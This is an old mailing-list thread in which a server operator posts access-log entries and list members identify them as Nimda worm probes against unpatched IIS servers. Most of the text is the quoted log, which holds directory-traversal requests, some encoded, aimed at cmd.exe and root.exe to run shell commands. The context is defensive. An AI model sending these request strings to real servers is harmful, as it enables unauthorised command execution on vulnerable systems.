Thanks, Hank Tony and Alex. I was aware that it was no harm to Sambar and since I don't run IIs, no worries here. However, I have tracked down one of the offending servers and wanted to contact them with informed information. That's why I needed the name of the virus on their server.
Dave Culbertson On 11/May/2002 10:51:22, Tony Mallen wrote: > Nimda virus from unpatched microft servers.But its getting a 404 error so should be >okay. > > On 11/May/2002 04:59:49, Dave Culbertson wrote: > > Does anyone recognize what kind of virus or bot would cause the following access >log entries? > > > > 64.65.199.33 - - [04/May/2002:00:45:06 -0400] "GET /scripts/root.exe?/c+dir >HTTP/1.0" 404 565 0 "-" "-" > > 64.65.199.33 - - [04/May/2002:00:45:07 -0400] "GET /MSADC/root.exe?/c+dir >HTTP/1.0" 404 565 0 "-" "-" > > 64.65.199.33 - - [04/May/2002:00:45:08 -0400] "GET >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > > 64.65.199.33 - - [04/May/2002:00:45:09 -0400] "GET >/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > > 64.65.199.33 - - [04/May/2002:00:45:10 -0400] "GET >/scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > > 64.65.199.33 - - [04/May/2002:00:45:11 -0400] "GET >/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 >"-" "-" > > 64.65.199.33 - - [04/May/2002:00:45:12 -0400] "GET >/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 >"-" "-" > > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET >/msadc/..%5c../..%5c../..%5c/..� ../..� ../..� ../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 565 0 "-" "-" > > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET >/scripts/..� ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > > 64.65.199.33 - - [04/May/2002:00:45:14 -0400] "GET >/scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > > 64.65.199.33 - - [04/May/2002:00:45:15 -0400] "GET >/scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > > 64.65.199.33 - - [04/May/2002:00:45:16 -0400] "GET >/scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > > 64.65.199.33 - - [04/May/2002:00:45:17 -0400] "GET >/scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > > 64.65.199.33 - - [04/May/2002:00:45:21 -0400] "GET >/scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > > 64.65.199.33 - - [04/May/2002:00:45:23 -0400] "GET >/scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > > 64.65.199.33 - - [04/May/2002:00:45:25 -0400] "GET >/scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-" > > > > I am being accessed by quite a few computers with the same or simular entries and >would like to know the name of what this is. Thanks. > > > > Dave Culbertson > > > > ------------------------------------------------------- > > To unsubscribe please go to <A TARGET="_blank" >HREF="http://www.sambar.ch/list/";>http://www.sambar.ch/list/</A> > > > > > > > > > > > > > > > > > > > ------------------------------------------------------- > To unsubscribe please go to <A TARGET="_blank" >HREF="http://www.sambar.ch/list/";>http://www.sambar.ch/list/</A> > > > > > > > > ------------------------------------------------------- To unsubscribe please go to http://www.sambar.ch/list/
